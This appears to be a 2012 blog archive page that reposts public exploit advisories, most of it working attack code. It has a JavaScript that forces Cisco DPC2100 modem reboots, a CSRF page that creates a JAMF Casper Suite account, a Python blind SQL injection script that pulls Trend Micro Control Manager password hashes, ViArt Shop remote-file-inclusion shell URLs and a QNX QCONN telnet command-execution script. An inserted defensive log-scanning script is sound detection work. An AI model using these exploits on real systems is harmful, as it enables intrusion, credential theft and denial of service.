Archive for 27 September 2012

Cisco DPC2100 Denial of Service

The Cisco DPC2100 Denial of Service vulnerability makes it possible, via JavaScript, to force the modem to restart, and attacks can be staged against its ports.

# Exploit Title: Cisco DPC2100 Denial of Service
# Date: 09/01/2010
# Author: Daniel Smith
# Software Link: http://www.cisco.com/
# Version: HW:2.1/SW:v2.0.2r1256-060303
# Tested on: OSX 10.6/Win7
# CVE: CVE-2011-1613

=======================================================
 Information
=======================================================
Executing this script on page load will cause the user's modem to restart when 
they visit the page. This example uses JavaScript but can just as easily be written
in another language to accomplish something similar. The attack consists of
two parts.

Part 1 - Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl
PARAMS: SAAccessLevel=2&SAPassword=W2402

Part 2 - Modem Restart:
POST: http://192.168.100.1/goform/gscan
PARAMS: SADownStartingFrequency=705000000

=======================================================
 Proof of Concept (Javascript)
=======================================================
(function() {
  var b=document.getElementsByTagName('body')[0];
  var otherlib=false;
 
  if(typeof jQuery!='undefined') {
    console.log('This page already using jQuery v'+jQuery.fn.jquery);
  } else if (typeof $=='function') {
    otherlib=true;
  }
  function getScript(url,success){
    var script=document.createElement('script');
    script.src=url;
    var head=document.getElementsByTagName('head')[0],
        done=false;
    // Attach handlers for all browsers
    script.onload=script.onreadystatechange = function(){
      if ( !done && (!this.readyState
           || this.readyState == 'loaded'
           || this.readyState == 'complete') ) {
        done=true;
        success();
        script.onload = script.onreadystatechange = null;
        head.removeChild(script);
      }
    };
    head.appendChild(script);
  }
  getScript('http://code.jquery.com/jquery-latest.min.js',function() {
    if (typeof jQuery=='undefined') {
      console.log('Sorry, but jQuery wasn\'t able to load');
    } else {
          console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
        $.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );
          console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
        $.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );
          console.log('Reboot command sent.');
    }
  });
})();

JAMF Casper Suite MDM CSRF Vulnerability

A CSRF vulnerability has been found in JAMF Casper Suite MDM; the code relating to the vulnerability is below.

CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability

# Exploit Title: JAMF Software's Casper Suite MDM Solution CSRF
# Date: Discovered and reported July 2012
# Author: Jacob Holcomb/Gimppy042
# Software: JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
# CVE : CVE-2012-4051 for the CSRF 


<html>
<head>
<title>Download</title>
</head>

<body>

<form name="csrf" 
action="https://CASPERSUITE_SERVER:8443/editAccount.html" method="post">
<input type="hidden" name="view" value="Save"/>
<input type="hidden" name="source" value="jss"/>
<input type="hidden" name="lastPage" value="editAccountGeneral.jsp"/>
<input type="hidden" name="lastTab" value="Account"/>
<input type="hidden" name="username" value="Gimppy"/>
<input type="hidden" name="realname" value="Pwnd"/>
<input type="hidden" name="email" value="Admin"/>
<input type="hidden" name="phone" value="Password"/>
<input type="hidden" name="password" value="pwnd1"/>
<input type="hidden" name="vpassword" value="pwnd1"/>
<input type="hidden" name="user_id" value="1"/>
</form>

<script>
document.csrf.submit();
</script>

</body>
</html>


If the HTML parameter/variable "user_id" is changed to a value of negative
one (-1) this request to the web server will create a new user.

Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection

A blind SQL injection vulnerability was found in the AdHocQuery module of Trend Micro Control Manager 5.5/6.0.
The Python exploit for the vulnerability is below; it provides access to the tables. Through the flaw in AdHocQuery_Processor.aspx, username and password data can be retrieved.

#!/usr/bin/env python

# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
# Disclosure Date: 09/27/2012
# Author: otoy  & modpr0be ()
# Contact: research[at]spentera.com
# Platform: Windows
# Tested on: Windows 2003 Standard Edition
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
# CVE-ID: CVE-2012-2998

### Software Description
# Trend Micro Control Manager is a centralized security management for the enterprise.
# The web-based management console tracks security performance, reports malware events and 
# policy violations, and automates routine tasks. New features include a customizable dashboard 
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network, 
# Trend Micro's cloud-based security infrastructure.

### Vulnerability Details
# Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the 
# id parameter, let's say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds, 
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.

# The script below is just a proof of concept, you must get a cookie. This vulnerability will need some 
# attack vectors to be exploited, but it is still a vulnerability.
# Remember to set the cookie first.

### Disclosure Timeline
# 07/23/2012 - Bug found
# 07/25/2012 - Reported to CERT/CC
# 07/26/2012 - Reported to JPCERT/CC
# 08/14/2012 - Vendor received the vulnerability
# 09/20/2012 - Vendor acknowledged the vulnerability
# 09/27/2012 - Public advisory released


import sys,time,urllib,urllib2

print """
#===============================================================#
|                                                               |
|            ___|                   |                           |
|          \___ \  __ \   _ \ __ \  __|  _ \  __| _` |          |
|                | |   |  __/ |   | |    __/ |   (   |          |
|          _____/  .__/ \___|_|  _|\__|\___|_|  \__,_|          |
|                 _|                                            |
|                                                               |
|    Trend Micro Control Manager BlindSQLi Password Extractor   |
|                         CVE-2012-2998                         |
|          by otoy & modpr0be (research[at]spentera.com)        |
|                                                               |
#===============================================================#
"""
host = raw_input("[+] Target IP: ")
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)
#SQLi delay, for remote target increase the delay time (default: 2 seconds)
delay=2

cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")

def Hex2Des(item):
        return ord(hex(item).replace('0x',''))

def konek(m,n):
        #borrow from SQLmap :)
        query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
               " WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))

        values = { 'Action': 'View',             
                   'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,
                   'asc': 'true',
                   'Sort': 7,
                   'paging': 10 }
 
        url = "%s?%s" % (target, urllib.urlencode(values)) 
        req = urllib2.Request(url)                         
        req.add_header('Cookie', cookie)                  
        try:                                        
                starttime=time.time()
                response = urllib2.urlopen(req)     
                endtime = time.time()
                return int(endtime-starttime)
        except:                                             
                print '\n[-] Uh oh! Exploit fail..'                
                sys.exit(0)

print "[+] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to extract hash from the first user."
sys.stdout.write('[+] Here is the hash : ')
sys.stdout.flush()

starttime = time.time()
for m in range(1,33):
        for n in range(0,16):
                wkttunggu = konek(m,Hex2Des(n)) 
                if (wkttunggu < delay):                              
                        sys.stdout.write(chr(Hex2Des(n)))
                        sys.stdout.flush()
                        break
endtime = time.time()
print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)

ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerability

A remote file inclusion vulnerability was found in ViArt Shop Evaluation v4.1. Through it, a remote shell can be appended to the vulnerable URL to reach the server, upload any kind of file and run exploits. Although remote file include vulnerabilities have become far rarer, they can still be seen in some old scripts.
However, as things stand, even if a script has a file include vulnerability, the vast majority of hosting providers have already put countermeasures in place.

############################################
### Exploit Title: ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerability
### Date: 26/9/2012 
### Author: L0n3ly-H34rT 
### Contact:  
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.viart.com/
### Software Link: http://www.viart.com/downloads/viart_shop-4.1.zip
### Version: 4.1
### Tested on: Linux/Windows 
############################################

# Affected files :

1- ( /admin/admin_header.php ) on line 13 :

include_once($root_folder_path . "messages/" . $language_code . "/cart_messages.php");

2- ( /includes/ajax_list_tree.php ) on line 29 :

include_once($root_folder_path . "includes/navigator.php");

3- ( /includes/previews_functions.php ) on line 13 :

include_once($root_folder_path . "includes/sql_functions.php");

# P.O.C :

http://127.0.0.1/viart_shop-4.1/admin/admin_header.php?root_folder_path=http://127.0.0.1/shell.txt?

http://127.0.0.1/viart_shop-4.1/includes/ajax_list_tree.php?root_folder_path=http://127.0.0.1/shell.txt?

http://127.0.0.1/viart_shop-4.1/includes/previews_functions.php?root_folder_path=http://127.0.0.1/shell.txt?

############################################

# Greetz to my friendz
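The three web-side issues above (the Casper Suite CSRF, the Control Manager time-based blind SQL injection and the ViArt remote file inclusion) each leave a recognisable trace in ordinary web server logs. The Python 3 script below is an added example, not code from any of the advisories: it runs one detection rule per issue over constructed Combined Log Format lines; the trusted JSS origin, the client addresses and the 203.0.113.7 attacker host are assumed values.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed sample lines in Combined Log Format (not real traffic); the hosts are assumed.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Sep/2012:10:00:01 +0300] "GET /webapp/AdHocQuery/AdHocQuery_Processor.aspx?Action=View&id=350b651c-15c5-45ca-8d64-33b20f3fc4d8&asc=true HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Sep/2012:10:00:09 +0300] "GET /webapp/AdHocQuery/AdHocQuery_Processor.aspx?Action=View&id=350b651c-15c5-45ca-8d64-33b20f3fc4d8%27+WAITFOR+DELAY+%270:0:2%27--&asc=true HTTP/1.1" 200 5120 "-" "python-urllib/2.7"
10.0.0.9 - - [27/Sep/2012:10:01:00 +0300] "GET /viart_shop-4.1/includes/ajax_list_tree.php?root_folder_path=http://203.0.113.7/shell.txt? HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.12 - - [27/Sep/2012:10:02:00 +0300] "POST /editAccount.html HTTP/1.1" 302 0 "http://203.0.113.7/download.html" "Mozilla/5.0"
10.0.0.12 - - [27/Sep/2012:10:03:00 +0300] "POST /editAccount.html HTTP/1.1" 302 0 "https://jss.example.internal:8443/editAccountGeneral.jsp" "Mozilla/5.0"
"""
TRUSTED_HOSTS = {"jss.example.internal:8443"}  # assumed: the JSS's own origin(s)
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
TIME_SQLI_RE = re.compile(r"WAITFOR\s+DELAY|SLEEP\s*\(|BENCHMARK\s*\(|pg_sleep\s*\(", re.I)
URL_SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)  # http://, ftp://, php:// ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)" ')

def parse_line(line):
    """Split one Combined Log Format line into client, method, path, decoded params, referer."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, referer = m.groups()
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"client": client, "method": method, "path": parts.path,
            "params": params, "referer": referer}

def check_request(rec):
    """Return [(rule, detail), ...] for one parsed request; an empty list means clean."""
    findings, p = [], rec["params"]
    # Rule 1: the TMCM AdHocQuery 'id' is a bare GUID; anything else is tampering,
    # and a delay primitive inside it is the time-based blind SQLi from the advisory.
    if rec["path"].lower().endswith("/adhocquery_processor.aspx") and "id" in p \
            and not GUID_RE.match(p["id"]):
        kind = "time-based SQLi" if TIME_SQLI_RE.search(p["id"]) else "malformed id"
        findings.append(("tmcm-adhocquery-id", kind))
    # Rule 2: a ViArt root_folder_path carrying a URL scheme is a remote file inclusion attempt.
    if URL_SCHEME_RE.match(p.get("root_folder_path", "")):
        findings.append(("viart-rfi", p["root_folder_path"]))
    # Rule 3: POST to the JSS account editor whose Referer is not the JSS itself is the CSRF pattern.
    if rec["method"] == "POST" and rec["path"].endswith("/editAccount.html") \
            and urlsplit(rec["referer"]).netloc not in TRUSTED_HOSTS:
        findings.append(("casper-csrf", rec["referer"]))
    return findings

def scan(log_text):
    """Run every rule over a whole log; returns [(client, rule, detail), ...] in log order."""
    return [(rec["client"], rule, detail)
            for rec in map(parse_line, log_text.splitlines()) if rec
            for rule, detail in check_request(rec)]
```

Rule 3 also flags clients that strip the Referer header, so treat it as a triage signal and rely on a per-session synchronizer token on the server for actual protection; the same Referer check applies to the DPC2100's /goform endpoints, which accept the same kind of cross-origin POST.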

QNX QCONN Remote Command Execution Vulnerability

QNX QCONN remote connection and command execution vulnerability.
Using the Python exploit below in the form QCONNRC.py 192.168.0.1 8000, remote access to the server is possible.

# Title : QNX QCONN Remote Command Execution Vulnerability
# Version : QNX 6.5.0 >= , QCONN >= 1.4.207944
# Download: http://www.qnx.com/download/feature.html?programid=23665 (QNX Neutrino 6.5.0 SP1)
# Vendor : http://www.qnx.com
# Date : 2012/09/09
# CVE : N/A
# Exploit Author : Mor!p3r(moriper[at]gmail.com)

import telnetlib
import sys

if len(sys.argv) < 3:
  print " "
  print " -----------------------------------------------------"
  print " + Qconn Remote Command Execution PoC (Shutdown) +"
  print " -----------------------------------------------------"
  print " "
  print " + Usage: QCONNRC.py <Target IP> <Port>"
  print "    + Ex> QCONNRC.py 192.168.0.1 8000"
  print ""
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
attack ="service launcher\n" + "start/flags 8000 /bin/shutdown /bin/shutdown -b\n" + "continue\n"
telnet = telnetlib.Telnet(host, port)
telnet.write(attack)
print "[+] Finish"
telnet.close()